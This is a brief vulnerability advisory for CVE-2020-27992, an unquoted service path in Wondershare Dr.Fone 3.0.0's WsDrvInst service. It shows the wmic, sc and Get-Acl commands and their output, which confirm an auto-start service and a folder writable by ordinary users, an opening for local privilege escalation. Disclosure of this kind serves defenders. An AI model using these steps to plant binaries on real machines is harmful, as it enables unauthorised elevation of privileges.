Wondershare Dr.Fone version 3.0.0 suffers from an unquoted service path vulnerability.
advisories | CVE-2020-27992
# Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvInst" Unquoted Service Path
# Date: 2020-10-29
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.wondershare.com
# Software Link: https://drfone.wondershare.com/
# Version: 3.0.0
# Tested on: Microsoft Windows 7sp2 x86/x64
# CVE : CVE-2020-27992
- C:>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """
Wondershare Driver Install Service WsDrvInst C:Program Files (x86)Wondersharedr.foneLibraryDriverInstallerDriverInstall.exe Auto
- C:>sc query WsDrvInst
NOME_SERVIZIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
STATO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CODICE_USCITA_WIN32 : 0 (0x0)
CODICE_USCITA_SERVIZIO : 0 (0x0)
PUNTO_CONTROLLO : 0x0
INDICAZIONE_ATTESA : 0x0
- Get-Acl -Path "C:Program Files (x86)Wondersharedr.foneLibraryDriverInstaller"
Directory: C:Program Files (x86)Wondersharedr.foneLibrary
Path Owner Access
---- ----- ------
DriverInstaller BUILTINAdministrators BUILTINUsers Allow FullControl...
